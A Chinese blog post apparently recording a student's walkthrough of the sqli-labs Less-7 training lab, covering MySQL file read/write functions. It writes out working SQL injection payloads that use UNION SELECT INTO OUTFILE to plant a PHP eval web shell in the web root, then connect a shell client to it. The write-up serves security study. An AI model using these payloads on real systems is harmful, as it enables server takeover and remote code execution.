B_roin

导航

sqli-labs less-7

文件导入笔记

  1. Load_file(file_name):读取文件并返回该文件的内容作为一个字符串

*使用条件:必须有权限读取并文件必须完全可读 -->  欲读取文件必须在服务器上 --> 必须指定文件完整的路径 -->

欲读取文件必须小于max_allowed_packet

(若上述任一条件不能满足则文件不能被读取,函数值返回空)

*难点:绝对路径;构造有效的畸形语句(报错爆出绝对路径)

(在很多PHP程序中,当提交一个错误的query,如果display_errors==on,程序就会暴露web目录的绝对路径)

原文链接:https://blog.csdn.net/qq_35544379/article/details/77833262文件导入的学习

   2.导入内容到文件:可任意内容到文件中去(这里需要文件权限)

                    Select .... into outfile ‘file_name’   [file_name] (不能是已存在的文件)

                    *直接导入内容

                   Select version() into outfile ‘C:\\...\\...\\... .txt’

                   Select <?php @eval($_POST[\’zzz\’]);?> into outfile ‘文件路径

                   *插入内容到文件结尾

                   Select version() into outfile “C:\\...\\...\\... .txt” LINES TERMINATED BY  

                   0x16进制文件(通常使用\r\n结尾,此处修改为自己想要的任何文件,同时可以用FIELDS TERMINATED BY

 

-------------------------------------------------------END----------------------------------------------------------------

 

Less-7(文件导入)

1.判断是否存在注入点

  当执行?id=1以及?id=1时,回显正确,而当执行?id=1’时回显错误,由此初步判断存在注入点,当执行?id=1

’ --+回显仍然错误,经过尝试?id=1’)) --+回显正确,得知注入方式为:((‘’))

2.判断字段数

  执行?id=1’)) order by 1,2,3 --+,得到字段数为3

3.判断是否为最高权限

  根据use outfile 我们已经得到了提示,与文件有关,执行?id=1"))and (select count(*) from mysql.users)>0,回显正常,确实是最高权限

  4.文件导入

  执行?id=-1’)) union select 1,2,’<? php @eval($_POST[“111”]);?>’ into outfile “D:\\phpstudy_pro\\WWW\\temp\\less-7.php” --+发现怎么都没有结果,网上查询过后,在下图中找到答案博客来源:https://blog.csdn.net/qq_34444097/article/details/80039116

    根据这个进行尝试,因为less-7是没有回显的,所以在Less-1中,执行?id=-1’ union select 1,@@datadir,@@basedir --+得到如下:

   再次回到Less-7中执行?id=-1’)) union select 1,2,’<?php @eval($_POST[“111”]);?>’ into outfile ”D:\\phpstudy_pro\\Extension\\MySQL5.7.26\\data\\less-7.php” --+,发现居然还是不行!!!(文件没有新建成功)但是,天无绝人之路,经过几个小时的学习尝试发现了https://www.jianshu.com/p/c0c951dd5cbe有我想要的答案,在sqli-labs-master中的less-7result.txt文件中发现,命令都能够正常执行,参考上述链接中的解决办法

 

my.ini文件中,分为三个板块,将secure-file-priv=’’添加在mysqld下才行(不知道mysql行不行,反正client不行!!)

  如下图,成功导入php文件

但是发现无法在网页中127.0.0.1/less-7.php打开,才发现要写一个?id=-1')) union select 1,2,'<?php @eval($_POST["111"]);?>' into outfile 'D:\\phpstudy_pro\\WWW\\less-7.php' --+ ,如下图,成功打开

 

 5.链接菜刀

(如下图,链接成功)

 

-------------------------------------------------------END----------------------------------------------------------------

 

posted on 2020-02-11 21:11  B_roin  阅读(142)  评论(0编辑  收藏  举报